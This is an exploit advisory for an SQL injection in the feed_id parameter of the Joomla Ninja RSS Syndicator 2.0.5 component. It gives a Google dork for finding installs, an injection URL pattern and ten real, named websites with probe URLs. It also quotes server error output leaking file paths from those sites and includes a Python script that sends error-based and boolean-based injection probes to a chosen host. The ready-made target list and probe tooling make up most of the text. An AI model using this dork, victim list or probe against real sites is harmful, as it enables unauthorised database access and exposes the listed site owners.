- ####################################################################
- # Exploit Title : Joomla Ninja RSS Syndicator Component 2.0.5 SQL Injection
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 04/02/2019
- # Vendor Homepage : ninjaforge.com
- # Software Download Link : ninjaforge.com/extensions/download/ninja-rss-syndicator
- # Software Information Link : ninjaforge.com/extensions/ninja-rss-syndicator
- # Software Version : 2.0.5 for Joomla 2.5
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Google Dorks : inurl:"/index.php?option=com_ninjarsssyndicator"
- # Vulnerability Type : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
- ####################################################################
- # Description about Software :
- ***************************
- The ultimate Joomla RSS Feed Creator!
- Have complete control over your website's RSS feeds. Create feeds for sections or categories.
- Create any number of RSS feeds, select which sections and categories to include or exclude.
- Choose whether to render images or HTML in the feed.
- Output the whole article in the feed, just the introduction or a certain number of words.
- The Ninja RSS Syndicator puts you in control of your feeds.
- ####################################################################
- # Impact :
- ***********
- The Joomla Ninja RSS Syndicator component, version 2.0.5 (other versions may also be affected),
- is prone to an SQL injection vulnerability because it fails to sufficiently sanitize
- user-supplied data (the feed_id request parameter) before using it in an SQL query.
- Exploiting this issue could allow an attacker to compromise the application,
- access or modify data, or exploit latent vulnerabilities in the underlying database.
- A remote attacker can send a specially crafted request to the vulnerable component
- and execute arbitrary SQL commands in the application's database.
- Further exploitation of this vulnerability may result in unauthorized data manipulation.
- Because the injection point is a GET parameter, the issue can be exploited with nothing more than a browser.
- ####################################################################
- # SQL Injection Exploit :
- **********************
- /index.php?option=com_ninjarsssyndicator&feed_id=[SQL Injection]
- ####################################################################
- # Example Vulnerable Sites :
- ************************
- [+] chiesabergamo.it/it/index.php?option=com_ninjarsssyndicator&feed_id=1%27
- [+] core.ieee-whispers.com/index.php?option=com_ninjarsssyndicator&feed_id=1%27
- [+] pcinabol.hr/index.php?option=com_ninjarsssyndicator&feed_id=3%27
- [+] demujeres.com.ar/index/index.php?option=com_ninjarsssyndicator&feed_id=1%27
- [+] enghelabe-eslami.com/index.php?option=com_ninjarsssyndicator&feed_id=5%27
- [+] streamproject.eu/index.php?option=com_ninjarsssyndicator&feed_id=2%27
- [+] douglasramiro.com.br/imacbrasil.com.br/index.php?option=com_ninjarsssyndicator&feed_id=1%27
- [+] beeshrimp.at/index.php?option=com_ninjarsssyndicator&feed_id=3%27
- [+] csir.wielkanieszawka.alstal.eu/index.php?option=com_ninjarsssyndicator&feed_id=1%27
- [+] sheridanfootball.com/joomla/index.php?option=com_ninjarsssyndicator&feed_id=1%27
- ####################################################################
- # Server Error Output :
- *********************
- Note: the output below, returned for a request with a quote appended to feed_id, consists of
- PHP "Strict Standards" notices and an fopen() warning, not MySQL error messages. It shows that
- error display is enabled and leaks the web root path, but it does not by itself prove that the
- quote reached the database. Confirm the injection with a differential test
- (feed_id=1 AND 1=1 versus feed_id=1 AND 1=2) or a time-based payload before reporting.
- Strict Standards: Non-static method JLoader::import() should not be
- called statically in /web/htdocs/www.chiesabergamo.it
- /home/it/libraries/joomla/import.php on line 29
- Warning: fopen(D:\Hosting\4907873\html\joomla\components\com_ninjarsssyndicator
- \feed\feed1.xml) [function.fopen]: failed to open stream: Permission denied in
- D:\Hosting\4907873\html\joomla\components\com_ninjarsssyndicator
- \views\ninjarsssyndicator\tmpl\feedcreator.class.php on line 670
- ####################################################################
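- # Verification Example :
- ************************
- The Python script below is an added example for the feed_id injection point and the
- error-output caveat above; it is not code from this advisory or from the NinjaForge component.
- It builds the four probe URLs for one site (baseline, AND 1=1, AND 1=2, trailing quote) and
- classifies the responses: a MySQL error string in the quote response means error-based injection,
- a baseline that matches AND 1=1 but differs from AND 1=2 means boolean-based injection, and
- PHP notices alone are inconclusive. The sample responses and the table name in the sample
- error are constructed, example.com is a placeholder host, and the MySQL error strings are
- common ones rather than anything captured from the sites listed above.

```python
"""Probe helper for the feed_id SQL injection described in this advisory.

Added example, not code from the advisory or the NinjaForge component.
Sample responses are constructed; example.com is a placeholder host.
"""
import re
import sys
import urllib.error
import urllib.parse
import urllib.request

COMPONENT = "com_ninjarsssyndicator"
PARAM = "feed_id"

# Strings that show the injected quote reached MySQL/MariaDB. PHP runtime
# output ("Strict Standards: ...", "Warning: fopen(...)") is deliberately
# absent: it proves error display is on, not that an SQL error occurred.
MYSQL_ERROR_PATTERNS = (
    r"You have an error in your SQL syntax",
    r"mysql_fetch_(?:array|assoc|row|object)\(\)",
    r"Warning: mysqli?_",
    r"supplied argument is not a valid MySQL",
    r"JDatabase\w*::query: \d+",   # Joomla 2.5 prefixes DB errors this way
)


def build_probe_urls(base, feed_id):
    """Return probe URLs. base is scheme+host(+path prefix), feed_id a
    numeric id known to return a feed (the baseline)."""
    def url(value):
        query = urllib.parse.urlencode({"option": COMPONENT, PARAM: value})
        return f"{base.rstrip('/')}/index.php?{query}"
    return {
        "baseline": url(str(feed_id)),
        "true": url(f"{feed_id} AND 1=1"),
        "false": url(f"{feed_id} AND 1=2"),
        "quote": url(f"{feed_id}'"),
    }


def has_mysql_error(body):
    """True only if a database error string is present in the body."""
    return any(re.search(p, body) for p in MYSQL_ERROR_PATTERNS)


def normalize(body):
    """Drop the build timestamp so equal feeds compare equal."""
    return re.sub(r"<lastBuildDate>.*?</lastBuildDate>", "", body, flags=re.S).strip()


def classify(baseline, true_body, false_body, quote_body):
    """Return 'error-based', 'boolean-based' or 'inconclusive'."""
    if has_mysql_error(quote_body):
        return "error-based"
    b, t, f = (normalize(x) for x in (baseline, true_body, false_body))
    # If feed_id lands inside the WHERE clause, 'AND 1=1' is a no-op and
    # 'AND 1=2' empties the result set; otherwise both behave the same.
    if b == t and b != f:
        return "boolean-based"
    return "inconclusive"


# Constructed sample responses (not captured from any real site).
SAMPLE_FEED = ('<?xml version="1.0"?><rss><channel><title>News</title>'
               '<lastBuildDate>Mon, 04 Feb 2019 10:00:00 +0000</lastBuildDate>'
               '<item><title>Post 1</title></item></channel></rss>')
SAMPLE_EMPTY = '<?xml version="1.0"?><rss><channel><title>News</title></channel></rss>'
SAMPLE_PHP_NOTICE = ("Strict Standards: Non-static method JLoader::import() should "
                     "not be called statically in /var/www/libraries/joomla/"
                     "import.php on line 29\n" + SAMPLE_FEED)
SAMPLE_MYSQL_ERROR = ("JDatabaseMySQL::query: 1064 - You have an error in your SQL "
                      "syntax; check the manual that corresponds to your MySQL "
                      "server version for the right syntax to use near ''' at "
                      "line 1 SQL=SELECT * FROM jos_ninjarss_feeds WHERE id = 1'")


def fetch(url, timeout=10):
    """Fetch a URL and return the body, including bodies of HTTP error pages."""
    req = urllib.request.Request(url, headers={"User-Agent": "feed-probe/1.0"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.read().decode("utf-8", "replace")


def probe_site(base, feed_id=1):
    """Run the four requests against a site you are authorised to test."""
    bodies = {name: fetch(u) for name, u in build_probe_urls(base, feed_id).items()}
    return classify(bodies["baseline"], bodies["true"], bodies["false"], bodies["quote"])


if __name__ == "__main__":
    if len(sys.argv) == 2:
        print(probe_site(sys.argv[1]))
    else:  # offline demonstration on the constructed samples
        print("PHP notice only  ->", classify(SAMPLE_FEED, SAMPLE_FEED, SAMPLE_FEED, SAMPLE_PHP_NOTICE))
        print("boolean differential ->", classify(SAMPLE_FEED, SAMPLE_FEED, SAMPLE_EMPTY, SAMPLE_PHP_NOTICE))
        print("MySQL error      ->", classify(SAMPLE_FEED, SAMPLE_FEED, SAMPLE_EMPTY, SAMPLE_MYSQL_ERROR))
```

- Run it with no arguments to see the three constructed cases classified; pass a site base such as
- https://example.com/it (a host you are authorised to test) to run the four requests for real.
- ####################################################################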
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ####################################################################